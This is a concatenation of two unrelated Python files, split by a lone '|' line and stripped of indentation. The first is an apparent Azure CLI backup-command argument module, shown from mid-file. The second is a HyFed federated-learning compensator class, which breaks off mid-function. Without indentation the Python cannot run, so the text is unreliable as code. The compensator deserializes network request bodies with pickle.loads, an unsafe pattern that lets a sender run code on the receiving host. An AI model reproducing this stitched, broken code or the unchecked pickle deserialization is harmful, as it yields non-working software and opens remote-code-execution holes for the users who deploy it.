backup_management_type = CLIArgumentType(help=backup_management_type_help, arg_type=get_enum_type(allowed_backup_management_types), options_list=['--backup-management-type'])
extended_backup_management_type = CLIArgumentType(help=backup_management_type_help, arg_type=get_enum_type(allowed_extended_backup_management_types), options_list=['--backup-management-type'])
workload_type = CLIArgumentType(help=workload_type_help, arg_type=get_enum_type(allowed_workload_types), options_list=['--workload-type'])
azure_workload_type = CLIArgumentType(help=workload_type_help, arg_type=get_enum_type(allowed_azure_workload_types), options_list=['--workload-type'])
restore_mode_type = CLIArgumentType(help=restore_mode_help, arg_type=get_enum_type(['OriginalLocation', 'AlternateLocation']), options_list=['--restore-mode'])
restore_mode_workload_type = CLIArgumentType(help=restore_mode_help, arg_type=get_enum_type(['AlternateWorkloadRestore', 'OriginalWorkloadRestore', 'RestoreAsFiles']), options_list=['--restore-mode'])
resolve_conflict_type = CLIArgumentType(help=resolve_conflict_help, arg_type=get_enum_type(['Overwrite', 'Skip']), options_list=['--resolve-conflict'])
resource_id_type = CLIArgumentType(help=resource_id_help, options_list=['--resource-id'])
policy_type = CLIArgumentType(help=policy_help, options_list=['--policy'], completer=FilesCompleter(), type=file_type)
protectable_item_type = CLIArgumentType(help=workload_type_help, options_list=['--protectable-item-type'], arg_type=get_enum_type(allowed_protectable_item_type))
target_server_type = CLIArgumentType(help=target_server_type_help, options_list=['--target-server-type'], arg_type=get_enum_type(allowed_protectable_item_type))
protectable_item_name_type = CLIArgumentType(help=protectable_item_name_type_help, options_list=['--protectable-item-name'])
diskslist_type = CLIArgumentType(nargs='+', help=diskslist_help)
target_container_name_type = CLIArgumentType(options_list=['--target-container-name'], help=target_container_name_help)
filepath_type = CLIArgumentType(options_list=['--filepath'], help="The path to which the DB should be restored as files.")
from_full_rp_type = CLIArgumentType(options_list=['--from-full-rp-name'], help="Name of the starting Recovery point.")
target_tier_type = CLIArgumentType(help=target_tier_help, arg_type=get_enum_type(allowed_target_tier_type_chk_archivable), options_list=['--target-tier'])
tier_type = CLIArgumentType(help=tier_help, arg_type=get_enum_type(allowed_tier_type), options_list=['--tier'])
rehyd_priority_type = CLIArgumentType(help=rehyd_priority_type_help, arg_type=get_enum_type(allowed_rehyd_priority_type), options_list=['--rehydration-priority'])
mi_user_assigned_type = CLIArgumentType(options_list=['--mi-user-assigned'], help="UserAssigned Identity Id to be used for CMK encryption, this will be applicable for encryption using userassigned identity")
mi_system_assigned_type = CLIArgumentType(action='store_true', options_list=['--mi-system-assigned'], help="Provide this flag to use system assigned identity for encryption.")
encryption_key_id_type = CLIArgumentType(options_list=['--encryption-key-id'], help="The encryption key id you want to use for encryption")
infrastructure_encryption_type = CLIArgumentType(options_list=['--infrastructure-encryption'], arg_type=get_enum_type(['Enabled', 'Disabled']), help=infrastructure_encryption_type_help)
user_assigned_type = CLIArgumentType(nargs='+', options_list=['--user-assigned'], help="Space-separated list of userassigned identities to be assigned to Recovery Services Vault.")
user_assigned_remove_type = CLIArgumentType(nargs='*', options_list=['--user-assigned'], help="Space-separated list of userassigned identities to be removed from Recovery Services Vault.")
system_assigned_remove_type = CLIArgumentType(action='store_true', options_list=['--system-assigned'], help="Provide this flag to remove system assigned identity for Recovery Services Vault.")
system_assigned_type = CLIArgumentType(action='store_true', options_list=['--system-assigned'], help="Provide this flag to enable system assigned identity for Recovery Services Vault.")
# pylint: disable=too-many-statements
def load_arguments(self, _):
with self.argument_context('backup') as c:
c.argument('force', action='store_true', help='Force completion of the requested action.')
# Vault
with self.argument_context('backup vault') as c:
c.argument('vault_name', vault_name_type, options_list=['--name', '-n'], id_part='name')
c.argument('location', validator=get_default_location_from_resource_group)
with self.argument_context('backup vault create') as c:
c.argument('tags', arg_type=tags_type)
with self.argument_context('backup vault backup-properties set') as c:
c.argument('backup_storage_redundancy', arg_type=get_enum_type(['GeoRedundant', 'LocallyRedundant', 'ZoneRedundant']), help='Set backup storage properties for a Recovery Services vault.')
c.argument('soft_delete_feature_state', arg_type=get_enum_type(['Enable', 'Disable']), help='Set soft-delete feature state for a Recovery Services Vault.')
c.argument('cross_region_restore_flag', arg_type=get_enum_type(['True', 'False']), help='Set cross-region-restore feature state for a Recovery Services Vault. Default: False.')
# Identity
with self.argument_context('backup vault identity assign') as c:
c.argument('vault_name', vault_name_type, options_list=['--name', '-n'], id_part='name')
c.argument('system_assigned', system_assigned_type)
c.argument('user_assigned', user_assigned_type)
with self.argument_context('backup vault identity remove') as c:
c.argument('vault_name', vault_name_type, options_list=['--name', '-n'], id_part='name')
c.argument('system_assigned', system_assigned_remove_type)
c.argument('user_assigned', user_assigned_remove_type)
with self.argument_context('backup vault identity show') as c:
c.argument('vault_name', vault_name_type, options_list=['--name', '-n'], id_part='name')
# Encryption
with self.argument_context('backup vault encryption') as c:
c.argument('vault_name', vault_name_type, options_list=['--name', '-n'], id_part='name')
with self.argument_context('backup vault encryption update') as c:
c.argument('encryption_key_id', encryption_key_id_type)
c.argument('infrastructure_encryption', infrastructure_encryption_type)
c.argument('mi_user_assigned', mi_user_assigned_type)
c.argument('mi_system_assigned', mi_system_assigned_type)
with self.argument_context('backup vault encryption show') as c:
c.argument('vault_name', vault_name_type, options_list=['--name', '-n'], id_part='name')
# Container
with self.argument_context('backup container') as c:
c.argument('vault_name', vault_name_type, id_part='name')
c.ignore('status')
with self.argument_context('backup container show') as c:
c.argument('name', container_name_type, options_list=['--name', '-n'], help='Name of the container. You can use the backup container list command to get the name of a container.', id_part='child_name_2')
c.argument('backup_management_type', extended_backup_management_type)
c.argument('use_secondary_region', action='store_true', help='Use this flag to show container in secondary region.')
with self.argument_context('backup container list') as c:
c.argument('vault_name', vault_name_type, id_part=None)
c.argument('backup_management_type', extended_backup_management_type)
c.argument('use_secondary_region', action='store_true', help='Use this flag to list containers in secondary region.')
with self.argument_context('backup container unregister') as c:
c.argument('backup_management_type', extended_backup_management_type)
c.argument('container_name', container_name_type, id_part='child_name_2')
with self.argument_context('backup container re-register') as c:
c.argument('backup_management_type', backup_management_type)
c.argument('container_name', container_name_type, id_part='child_name_2')
c.argument('workload_type', azure_workload_type)
with self.argument_context('backup container register') as c:
c.argument('vault_name', vault_name_type, id_part=None)
c.argument('backup_management_type', backup_management_type)
c.argument('resource_id', resource_id_type)
c.argument('workload_type', azure_workload_type)
# Item
with self.argument_context('backup item') as c:
c.argument('vault_name', vault_name_type, id_part='name')
c.argument('container_name', container_name_type, id_part='child_name_2')
with self.argument_context('backup item show') as c:
c.argument('name', item_name_type, options_list=['--name', '-n'], help='Name of the backed up item. You can use the backup item list command to get the name of a backed up item.', id_part='child_name_3')
c.argument('backup_management_type', extended_backup_management_type)
c.argument('workload_type', workload_type)
c.argument('use_secondary_region', action='store_true', help='Use this flag to show item in secondary region.')
# TODO: Need to use item.id once https://github.com/Azure/msrestazure-for-python/issues/80 is fixed.
with self.argument_context('backup item set-policy') as c:
c.argument('item_name', item_name_type, options_list=['--name', '-n'], help='Name of the backed up item. You can use the backup item list command to get the name of a backed up item.', id_part='child_name_3')
c.argument('policy_name', policy_name_type, help='Name of the Backup policy. You can use the backup policy list command to get the name of a backup policy.')
c.argument('backup_management_type', backup_management_type)
c.argument('workload_type', workload_type)
with self.argument_context('backup item list') as c:
c.argument('vault_name', vault_name_type, id_part=None)
c.argument('backup_management_type', extended_backup_management_type)
c.argument('workload_type', workload_type)
c.argument('use_secondary_region', action='store_true', help='Use this flag to list items in secondary region.')
# Policy
with self.argument_context('backup policy') as c:
c.argument('vault_name', vault_name_type, id_part='name')
for command in ['show', 'delete', 'list-associated-items']:
with self.argument_context('backup policy ' + command) as c:
c.argument('name', policy_name_type, options_list=['--name', '-n'], help='Name of the backup policy. You can use the backup policy list command to get the name of a policy.', id_part='child_name_1')
with self.argument_context('backup policy list-associated-items') as c:
c.argument('backup_management_type', backup_management_type)
with self.argument_context('backup policy set') as c:
c.argument('policy', type=file_type, help='JSON encoded policy definition. Use the show command with JSON output to obtain a policy object. Modify the values using a file editor and pass the object.', completer=FilesCompleter())
c.argument('name', options_list=['--name', '-n'], help='Name of the Policy.', id_part='child_name_1')
c.argument('fix_for_inconsistent_items', arg_type=get_three_state_flag(), options_list=['--fix-for-inconsistent-items'], help='Specify whether or not to retry Policy Update for failed items.')
c.argument('backup_management_type', backup_management_type)
with self.argument_context('backup policy create') as c:
c.argument('policy', type=file_type, help='JSON encoded policy definition. Use the show command with JSON output to obtain a policy object. Modify the values using a file editor and pass the object.', completer=FilesCompleter())
c.argument('name', options_list=['--name', '-n'], help='Name of the Policy.')
c.argument('backup_management_type', backup_management_type)
c.argument('workload_type', workload_type)
with self.argument_context('backup policy list') as c:
c.argument('vault_name', vault_name_type, id_part=None)
c.argument('backup_management_type', backup_management_type)
c.argument('workload_type', workload_type)
with self.argument_context('backup policy get-default-for-vm') as c:
c.argument('vault_name', vault_name_type, id_part=None)
# Recovery Point
# TODO: Need to use item.id once https://github.com/Azure/msrestazure-for-python/issues/80 is fixed.
with self.argument_context('backup recoverypoint') as c:
c.argument('vault_name', vault_name_type, id_part='name')
c.argument('container_name', container_name_type, id_part='child_name_2')
c.argument('item_name', item_name_type, id_part='child_name_3')
with self.argument_context('backup recoverypoint list') as c:
c.argument('vault_name', vault_name_type, id_part=None)
c.argument('start_date', type=datetime_type, help='The start date of the range in UTC (d-m-Y).')
c.argument('end_date', type=datetime_type, help='The end date of the range in UTC (d-m-Y).')
c.argument('backup_management_type', backup_management_type)
c.argument('container_name', container_name_type)
c.argument('workload_type', workload_type)
c.argument('use_secondary_region', action='store_true', help='Use this flag to list recoverypoints in secondary region.')
c.argument('is_ready_for_move', arg_type=get_three_state_flag(), help='Use this flag to retrieve the recoverypoints that are ready to be moved to destination-tier.')
c.argument('target_tier', target_tier_type)
c.argument('tier', tier_type)
c.argument('recommended_for_archive', action="store_true", help='Use this flag to retrieve recommended archivable recoverypoints.')
with self.argument_context('backup recoverypoint move') as c:
c.argument('vault_name', vault_name_type, id_part=None)
c.argument('container_name', container_name_type)
c.argument('rp_name', rp_name_type, options_list=['--name', '-n'], id_part='child_name_4')
c.argument('backup_management_type', backup_management_type)
c.argument('workload_type', workload_type)
c.argument('source_tier', help='The source tier from which a particular recovery point has to be moved.', arg_type=get_enum_type(['VaultStandard']), options_list=['--source-tier'])
c.argument('destination_tier', help=target_tier_help, arg_type=get_enum_type(['VaultArchive']), options_list=['--destination-tier'])
with self.argument_context('backup recoverypoint show-log-chain') as c:
c.argument('vault_name', vault_name_type, id_part=None)
c.argument('start_date', type=datetime_type, help='The start date of the range in UTC (d-m-Y).')
c.argument('end_date', type=datetime_type, help='The end date of the range in UTC (d-m-Y).')
c.argument('backup_management_type', backup_management_type)
c.argument('container_name', container_name_type)
c.argument('workload_type', workload_type)
c.argument('use_secondary_region', action='store_true', help='Use this flag to list recoverypoints in secondary region.')
with self.argument_context('backup recoverypoint show') as c:
c.argument('name', rp_name_type, options_list=['--name', '-n'], help='Name of the recovery point. You can use the backup recovery point list command to get the name of a backed up item.', id_part='child_name_4')
c.argument('backup_management_type', backup_management_type)
c.argument('container_name', container_name_type)
c.argument('workload_type', workload_type)
c.argument('use_secondary_region', action='store_true', help='Use this flag to show recoverypoints in secondary region.')
# Protection
with self.argument_context('backup protection') as c:
c.argument('vault_name', vault_name_type, id_part='name')
c.argument('vm', help='Name or ID of the Virtual Machine to be protected.')
c.argument('policy_name', policy_name_type)
# TODO: Need to use item.id once https://github.com/Azure/msrestazure-for-python/issues/80 is fixed.
for command in ['backup-now', 'disable', 'resume', 'undelete', 'update-for-vm']:
with self.argument_context('backup protection ' + command) as c:
c.argument('container_name', container_name_type, id_part='child_name_2')
c.argument('item_name', item_name_type, id_part='child_name_3')
c.argument('backup_management_type', backup_management_type)
c.argument('workload_type', workload_type)
c.argument('enable_compression', arg_type=get_three_state_flag(), help='Option to enable compression')
c.argument('backup_type', help=backup_type_help, options_list=['--backup-type'])
with self.argument_context('backup protection backup-now') as c:
c.argument('retain_until', type=datetime_type, help=retain_until_help)
with self.argument_context('backup protection disable') as c:
c.argument('delete_backup_data', arg_type=get_three_state_flag(), help='Option to delete existing backed up data in the Recovery services vault.')
c.argument('backup_management_type', backup_management_type)
c.argument('workload_type', workload_type)
with self.argument_context('backup protection check-vm') as c:
c.argument('vm_id', help='ID of the virtual machine to be checked for protection.', deprecate_info=c.deprecate(redirect='--vm', hide=True))
with self.argument_context('backup protection enable-for-vm') as c:
c.argument('vault_name', vault_name_type, id_part=None)
c.argument('diskslist', diskslist_type)
c.argument('disk_list_setting', arg_type=get_enum_type(['include', 'exclude']), options_list=['--disk-list-setting'], help=disk_list_setting_help)
c.argument('exclude_all_data_disks', arg_type=get_three_state_flag(), help='Option to specify to backup OS disk only.')
with self.argument_context('backup protection update-for-vm') as c:
c.argument('diskslist', diskslist_type)
c.argument('disk_list_setting', arg_type=get_enum_type(['include', 'exclude', 'resetexclusionsettings']), options_list=['--disk-list-setting'], help=disk_list_setting_help)
c.argument('exclude_all_data_disks', arg_type=get_three_state_flag(), help='Option to specify to backup OS disk only.')
with self.argument_context('backup protection enable-for-azurefileshare') as c:
c.argument('vault_name', vault_name_type, id_part=None)
c.argument('azure_file_share', options_list=['--azure-file-share'], help='Name of the Azure FileShare.')
c.argument('storage_account', options_list=['--storage-account'], help='Name of the Storage Account of the FileShare.')
for command in ["enable-for-azurewl", "auto-enable-for-azurewl", 'auto-disable-for-azurewl']:
with self.argument_context('backup protection ' + command) as c:
c.argument('vault_name', vault_name_type, id_part=None)
c.argument('protectable_item_type', protectable_item_type)
c.argument('protectable_item_name', protectable_item_name_type)
c.argument('server_name', options_list=['--server-name'], help='Parent Server name of the item.')
c.argument('workload_type', workload_type)
# Protectable-item
with self.argument_context('backup protectable-item') as c:
c.argument('vault_name', vault_name_type)
c.argument('workload_type', azure_workload_type)
c.argument('container_name', container_name_type)
with self.argument_context('backup protectable-item show') as c:
c.argument('vault_name', vault_name_type, id_part='name')
c.argument('name', options_list=['--name'], help='Name of the protectable item.', id_part='child_name_3')
c.argument('server_name', options_list=['--server-name'], help='Parent Server name of the item.')
c.argument('protectable_item_type', protectable_item_type)
with self.argument_context('backup protectable-item list') as c:
c.argument('server_name', options_list=['--server-name'], help='Parent Server name of the item.')
c.argument('protectable_item_type', protectable_item_type)
c.argument('backup_management_type', backup_management_type)
# Restore
# TODO: Need to use recovery_point.id once https://github.com/Azure/msrestazure-for-python/issues/80 is fixed.
with self.argument_context('backup restore') as c:
c.argument('vault_name', vault_name_type, id_part='name')
c.argument('container_name', container_name_type, id_part='child_name_2')
c.argument('item_name', item_name_type, id_part='child_name_3')
c.argument('rp_name', rp_name_type, id_part='child_name_4')
with self.argument_context('backup restore restore-disks') as c:
c.argument('storage_account', help='Name or ID of the staging storage account. The VM configuration will be restored to this storage account. See the help for --restore-to-staging-storage-account parameter for more info.')
c.argument('restore_to_staging_storage_account', arg_type=get_three_state_flag(), help='Use this flag when you want disks to be restored to the staging storage account using the --storage-account parameter. When not specified, disks will be restored to their original storage accounts. Default: false.')
c.argument('target_resource_group', options_list=['--target-resource-group', '-t'], help='Use this to specify the target resource group in which the restored disks will be saved')
c.argument('diskslist', diskslist_type)
c.argument('restore_only_osdisk', arg_type=get_three_state_flag(), help='Use this flag to restore only OS disks of a backed up VM.')
c.argument('restore_as_unmanaged_disks', arg_type=get_three_state_flag(), help='Use this flag to specify to restore as unmanaged disks')
c.argument('use_secondary_region', action='store_true', help='Use this flag to restore from a recoverypoint in secondary region.')
c.argument('rehydration_duration', type=int, help='Set the maximum time, in days (between 10-30, both inclusive) for which the recovery point stays in hydrated state.')
c.argument('rehydration_priority', rehyd_priority_type)
c.argument('disk_encryption_set_id', options_list=['--disk-encryption-set-id'], help='The disk encryption set id is used for encrypting restored disks. Please ensure access to disk encryption set id that is specified here.')
c.argument('mi_system_assigned', action='store_true', help='Use this flag to specify whether a system-assigned managed identity should be used for the restore operation. MI option is not applicable for restoring unmanaged disks.')
c.argument('mi_user_assigned', help='ARM ID of the user-assigned managed identity to use for the restore operation. Specify a value for this parameter if you do not want to use a system-assigned MI for restoring the backup item.')
c.argument('target_zone', arg_type=get_enum_type(['1', '2', '3']), help='A primary region currently can have three Azure availability zones. Use this argument to specify the target zone number while doing Cross Zonal Restore.')
with self.argument_context('backup restore restore-azurefileshare') as c:
c.argument('resolve_conflict', resolve_conflict_type)
c.argument('restore_mode', restore_mode_type)
c.argument('target_file_share', options_list=['--target-file-share'], help='Destination file share to which content will be restored')
c.argument('target_folder', options_list=['--target-folder'], help='Destination folder to which content will be restored. To restore content to root , leave the folder name empty')
c.argument('target_storage_account', options_list=['--target-storage-account'], help='Destination storage account to which content will be restored')
with self.argument_context('backup restore restore-azurefiles') as c:
c.argument('resolve_conflict', resolve_conflict_type)
c.argument('restore_mode', restore_mode_type)
c.argument('target_file_share', options_list=['--target-file-share'], help='Destination file share to which content will be restored')
c.argument('target_folder', options_list=['--target-folder'], help='Destination folder to which content will be restored. To restore content to root , leave the folder name empty')
c.argument('target_storage_account', options_list=['--target-storage-account'], help='Destination storage account to which content will be restored')
c.argument('source_file_type', arg_type=get_enum_type(['File', 'Directory']), options_list=['--source-file-type'], help='Specify the source file type to be selected')
c.argument('source_file_path', options_list=['--source-file-path'], nargs='+', help="""The absolute path of the file, to be restored within the file share, as a string. This path is the same path used in the 'az storage file download' or 'az storage file show' CLI commands.""")
with self.argument_context('backup restore restore-azurewl') as c:
c.argument('vault_name', vault_name_type, id_part=None)
c.argument('recovery_config', options_list=['--recovery-config'], help="""Specify the recovery configuration of a backed up item. The configuration object can be obtained from 'backup recoveryconfig show' command.""")
c.argument('rehydration_duration', type=int, help='Set the maximum time, in days (between 10-30, both inclusive) for which the recovery point stays in hydrated state.')
c.argument('rehydration_priority', rehyd_priority_type)
c.argument('use_secondary_region', action='store_true', help='Use this flag to restore from a recoverypoint in secondary region.')
# Recoveryconfig
with self.argument_context('backup recoveryconfig show') as c:
c.argument('container_name', container_name_type, id_part='child_name_2')
c.argument('item_name', item_name_type, id_part='child_name_3')
c.argument('restore_mode', restore_mode_workload_type)
c.argument('vault_name', vault_name_type, id_part='name')
c.argument('log_point_in_time', options_list=['--log-point-in-time'], help="""Specify the point-in-time (in UTC) which will be restored.""")
c.argument('rp_name', rp_name_type)
c.argument('target_item_name', options_list=['--target-item-name'], help="""Specify the target item name for the restore operation.""")
c.argument('target_server_type', target_server_type)
c.argument('target_server_name', options_list=['--target-server-name'], help="""Specify the parent server name of the target item.""")
c.argument('workload_type', azure_workload_type)
c.argument('target_container_name', target_container_name_type)
c.argument('from_full_rp_name', from_full_rp_type)
c.argument('filepath', filepath_type)
c.argument('backup_management_type', backup_management_type)
c.argument('target_resource_group', options_list=['--target-resource-group'], help="""Specify the resource group of target item for Cross Region Restore. Default value will be same as --resource-group if not specified.""")
c.argument('target_vault_name', options_list=['--target-vault-name'], help="""Specify the vault name of target item for Cross Region Restore. Default value will be same as --vault-name if not specified.""")
# Job
with self.argument_context('backup job') as c:
c.argument('vault_name', vault_name_type, id_part='name')
# TODO: Need to use job.id once https://github.com/Azure/msrestazure-for-python/issues/80 is fixed.
for command in ['show', 'stop', 'wait']:
with self.argument_context('backup job ' + command) as c:
c.argument('name', job_name_type, help='Name of the job. You can use the backup job list command to get the name of a job.', id_part='child_name_1')
c.argument('use_secondary_region', action='store_true', help='Use this flag to show recoverypoints in secondary region.')
with self.argument_context('backup job list') as c:
c.argument('vault_name', vault_name_type, id_part=None)
c.argument('status', arg_type=get_enum_type(['Cancelled', 'Completed', 'CompletedWithWarnings', 'Failed', 'InProgress']), help='Status of the Job.')
c.argument('operation', arg_type=get_enum_type(['Backup', 'ConfigureBackup', 'DeleteBackupData', 'DisableBackup', 'Restore']), help='User initiated operation.')
c.argument('start_date', type=datetime_type, help='The start date of the range in UTC (d-m-Y).')
c.argument('end_date', type=datetime_type, help='The end date of the range in UTC (d-m-Y).')
c.argument('backup_management_type', extended_backup_management_type)
c.argument('use_secondary_region', action='store_true', help='Use this flag to show recoverypoints in secondary region.')
with self.argument_context('backup job wait') as c:
c.argument('timeout', type=int, help='Maximum time, in seconds, to wait before aborting.')
|
"""
The main class to obtain the compensation parameters from the clients, aggregate them,
and share the aggregation results with the server
Copyright 2021 Reza NasiriGerdeh. All Rights Reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from hyfed_compensator.util.hyfed_parameters import Parameter, AuthenticationParameter, SyncParameter, ConnectionParameter, MonitoringParameter
from hyfed_compensator.util.status import OperationStatus
from hyfed_compensator.util.endpoint import EndPoint
from hyfed_compensator.util.utils import aggregate
from hyfed_compensator.util.monitoring import Timer, Counter
import pickle
import numpy as np
import time
import hashlib
import requests
from datetime import datetime
import logging
logger = logging.getLogger(__name__)
class HyFedCompensatorProject:
"""
Provide main functions to communicate with the clients and server,
and to aggregate the compensation parameters from the clients
"""
def __init__(self, project_id_hash, client_count):
""" Initialize the compensator project using the hash of the project ID and the number of clients """
# for compensator to know whether it has received compensation parameters from all clients
self.client_count = client_count
# hash of the project ID, which should be the same for all clients
self.project_id_hash = project_id_hash
# authentication parameters from the clients
self.client_token_hashes = list()
self.client_username_hashes = list()
# sync parameters from the clients
self.client_steps = list()
self.client_comm_rounds = list()
# compensation parameters (noise values) from the clients
self.client_compensation_parameters = list()
# data type parameters from clients
self.client_data_type_parameters = list()
# clients tell compensator where to send the aggregated noise values
self.server_urls = list()
# aggregated parameters have the same parameter names as the local model parameters of the clients
self.aggregated_compensation_parameters = dict()
# to tell the server whether the aggregation of noise values have been successful
self.operation_status = OperationStatus.DONE
# monitoring timers
self.computation_timer = Timer(name='Computation')
self.network_send_timer = Timer(name='Network Send')
# counter to track the traffic client -> compensator (in terms of bytes)
self.client_compensator_traffic = Counter("client->compensator")
self.upload_parameters_timeout = 600
# used for garbage collection purposes
self.last_updated_date = datetime.now().timestamp()
def add_client_parameters(self, request):
""" Append client's authentication, sync, connection, and compensation parameters to the corresponding lists """
try:
# new communication round starts for compensator if the parameters from the first client is received
if len(self.client_compensation_parameters) == 0:
self.computation_timer.new_round()
self.network_send_timer.new_round()
# add traffic size to client -> compensator traffic counter
traffic_size = int(request.headers['Content-Length'])
self.client_compensator_traffic.increment(traffic_size)
logger.debug(f'Project {self.project_id_hash}: {traffic_size} bytes added to client -> compensator traffic.')
self.computation_timer.start()
# extract client parameters from the request body
request_body = pickle.loads(request.body)
authentication_parameters = request_body[Parameter.AUTHENTICATION]
sync_parameters = request_body[Parameter.SYNCHRONIZATION]
compensation_parameters = request_body[Parameter.COMPENSATION]
connection_parameters = request_body[Parameter.CONNECTION]
data_type_parameters = request_body[Parameter.DATA_TYPE]
# authentication parameters
hash_username = authentication_parameters[AuthenticationParameter.HASH_USERNAME]
hash_token = authentication_parameters[AuthenticationParameter.HASH_TOKEN]
# sync parameters
step = sync_parameters[SyncParameter.PROJECT_STEP]
comm_round = sync_parameters[SyncParameter.COMM_ROUND]
# connection parameter
server_url = connection_parameters[ConnectionParameter.SERVER_URL]
# add the parameters to the lists
self.client_username_hashes.append(hash_username)
self.client_token_hashes.append(hash_token)
self.client_steps.append(step)
self.client_comm_rounds.append(comm_round)
self.server_urls.append(server_url)
self.client_compensation_parameters.append(compensation_parameters)
self.client_data_type_parameters.append(data_type_parameters)
self.computation_timer.stop()
logger.debug(f'Project {self.project_id_hash}: Client parameters added!')
except Exception as add_parameter_exp:
logger.error(f'Project {self.project_id_hash}: Adding client parameters was failed!')
logger.error(f'Project {self.project_id_hash}: The exception is: {add_parameter_exp}')
self.computation_timer.stop()
self.set_operation_status_failed()
def aggregate_client_parameters(self):
""" Aggregate client parameters including the compensation parameters from all clients """
try:
self.computation_timer.start()
logger.debug(f"Project {self.project_id_hash}: Aggregating client parameters ...")
# make sure all clients are in the same step and communication round
if not self.is_client_sync_ok():
logger.error(f'Project {self.project_id_hash}: The step/comm_round of the clients are different!')
self.computation_timer.stop()
self.set_operation_status_failed()
return
# ensure all clients are coordinated by the same server
if not self.is_server_url_same():
logger.error(f'Project {self.project_id_hash}: Server URL is different for the clients!')
self.computation_timer.stop()
self.set_operation_status_failed()
return
# make sure compensator parameter names are the same across the clients
if not self.is_client_compensation_parameters_ok():
logger.error(f'Project {self.project_id_hash}: Compensation parameter names are different across clients!')
self.computation_timer.stop()
self.set_operation_status_failed()
return
# aggregate the compensation parameters
for parameter_name in self.client_compensation_parameters[0].keys():
compensation_values = self.compensation_parameter_to_list(parameter_name)
parameter_data_type = self.client_data_type_parameters[0][parameter_name]
aggregated_compensation_value = aggregate(compensation_values, parameter_data_type)
self.aggregated_compensation_parameters[parameter_name] = -aggregated_compensation_value
self.computation_timer.stop()
except Exception as aggregate_exp:
logger.error(f'Project {self.project_id_hash}: Aggregating the compensation parameters was failed!')
logger.error(f'Project {self.project_id_hash}: The exception is: {aggregate_exp}')
self.computation_timer.stop()
self.set_operation_status_failed()
def send_to_server(self):
""" Send aggregated authentication, sync, monitoring, and compensation parameters to the server """
# create and serialize request body
parameters_serialized = self.prepare_server_parameters()
max_tries = 10
for _ in range(max_tries):
try:
logger.debug(f"Project {self.project_id_hash}: Sending the aggregated parameters to the server ...")
self.network_send_timer.start()
response = requests.post(url=f'{self.server_urls[0]}/{EndPoint.MODEL_COMPENSATION}',
data=parameters_serialized,
timeout=self.upload_parameters_timeout)
if response.status_code == 200:
logger.debug(f"Project {self.project_id_hash}: Sending done!")
self.network_send_timer.stop()
return
logger.error(f"Project {self.project_id_hash}: Sending failed, got {response.status_code} status code from the server!")
self.network_send_timer.stop()
time.sleep(30)
continue
except Exception as send_server_exp:
logger.error(f"Project {self.project_id_hash}: Sending failed!")
logger.error(f'Project {self.project_id_hash}: The exception is: {send_server_exp}')
self.network_send_timer.stop()
time.sleep(30)
def aggregate_and_send(self):
""" First aggregate, and then, send aggregated parameters to the server """
# aggregate client parameters including compensation parameters
self.aggregate_client_parameters()
# send the aggregated parameters to the server
self.send_to_server()
# empty the lists/dictionaries for the next round
self.client_token_hashes = list()
self.client_username_hashes = list()
self.client_steps = list()
self.client_comm_rounds = list()
self.client_compensation_parameters = list()
self.client_data_type_parameters = list()
self.server_urls = list()
self.aggregated_compensation_parameters = dict()
# ########## setter/getter functions
def set_operation_status_done(self):
""" If current operation is still in progress (not failed), then set it to Done """
if self.operation_status == OperationStatus.IN_PROGRESS:
self.operation_status = OperationStatus.DONE
def set_operation_status_in_progress(self):
""" If previous operation is done (not failed), then set current operation status to In Progress """
if self.operation_status == OperationStatus.DONE:
self.operation_status = OperationStatus.IN_PROGRESS
def set_operation_status_failed(self):
""" Regardless of the current status, set the operation status to Failed """
logger.error("Operation failed!")
self.operation_status = OperationStatus.FAILED
def set_last_updated_date(self):
self.last_updated_date = datetime.now().timestamp()
def is_operation_failed(self):
return self.operation_status == OperationStatus.FAILED
def get_last_updated_date(self):
return self.last_updated_date
# ########## Helper functions
def is_client_sync_ok(self):
""" Ensure the project step and communication round of all clients is the same """
try:
logger.debug(f"Project {self.project_id_hash}: checking synchronization status of the clients ...")
return (np.all(np.array(self.client_steps) == self.client_steps[0]) and
np.all(np.array(self.client_comm_rounds) == self.client_comm_rounds[0]))
except Exception as sync_exp:
logger.error(f'Project {self.project_id_hash}: Checking sync status of the clients was failed')
logger.error(f'Project {self.project_id_hash}: The exception is: {sync_exp}')
return False
def is_server_url_same(self):
""" Ensure the the server urls from all clients are the same """
try:
logger.debug(f"Project {self.project_id_hash}: Checking whether clients are coordinated by the same server ...")
return np.all(np.array(self.server_urls) == self.server_urls[0])
except Exception as server_url_exp:
logger.error(f'Project {self.project_id_hash}: Checking server urls was failed!')
logger.error(f'Project {self.project_id_hash}: The exception is: {server_url_exp}')
return False
def is_client_compensation_parameters_ok(self):
""" Make sure the names of the compensation parameters are consistent across clients """
try:
logger.debug(f"Project {self.project_id_hash}: checking whether compensation parameter names are consistent across all clients ...")
client1_compensation_parameter_names = self.client_compensation_parameters[0].keys()
for client_parameters in self.client_compensation_parameters:
if client_parameters.keys() != client1_compensation_parameter_names:
return False
return True
except Exception as compensation_param_exp:
logger.error(f'Project {self.project_id_hash}: Checking compensation parameter names was failed!')
logger.error(f'Project {self.project_id_hash}: The exception is: {compensation_param_exp}')
return False
def is_client_data_type_parameters_ok(self):
""" Make sure the names of the data type parameters are consistent across clients """
try:
logger.debug(f"Project {self.project_id_hash}: checking whether data type parameter names are consistent across all clients ...")
client1_data_type_parameter_names = self.client_data_type_parameters[0].keys()
for client_parameters in self.client_data_type_parameters:
if client_parameters.keys() != client1_data_type_parameter_names:
return False
return True
except Exception as compensation_param_exp:
logger.error(f'Project {self.project_id_hash}: Checking data type parameter names was failed!')
logger.error(f'Project {self.project_id_hash}: The exception is: {compensation_param_exp}')
return False
def should_aggregate_and_send(self):
""" Check whether compensation parameters from all clients received """
return len(self.client_username_hashes) == self.client_count
def compensation_parameter_to_list(self, parameter_name):
"""
Extract the compensation parameter of the clients specified with parameter_name as a list
"""
compensation_parameter_list = []
try:
for compensation_parameter in self.client_compensation_parameters:
compensation_parameter_list.append(compensation_parameter[parameter_name])
except Exception as convert_exp:
logger.error(f'Project {self.project_id_hash}: Converting compensation parameters to list was failed!')
logger.error(f'Project {self.project_id_hash}: The exception is: {convert_exp}')
self.set_operation_status_failed()
return compensation_parameter_list
def prepare_server_parameters(self):
""" Prepare the parameters shared with the server """
try:
self.computation_timer.start()
# initialize authentication parameters
authentication_parameters = dict()
